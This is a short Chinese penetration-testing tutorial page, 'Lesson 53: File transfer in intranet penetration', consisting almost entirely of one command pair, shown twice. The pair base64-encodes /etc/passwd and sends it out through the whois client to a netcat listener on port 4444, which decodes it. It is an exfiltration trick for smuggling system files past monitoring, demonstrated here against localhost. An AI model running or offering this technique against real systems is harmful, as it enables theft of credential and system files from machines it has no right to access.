第五十三课:内网渗透中的文件传输
root@john:~# whois -h 127.0.0.1 -p 4444 `cat /etc/passwd | base64`root@john:/tmp# nc -l -v -p 4444 | sed "s/ //g" | base64 -d

Last updated
Was this helpful?
root@john:~# whois -h 127.0.0.1 -p 4444 `cat /etc/passwd | base64`root@john:/tmp# nc -l -v -p 4444 | sed "s/ //g" | base64 -d

Last updated
Was this helpful?
Was this helpful?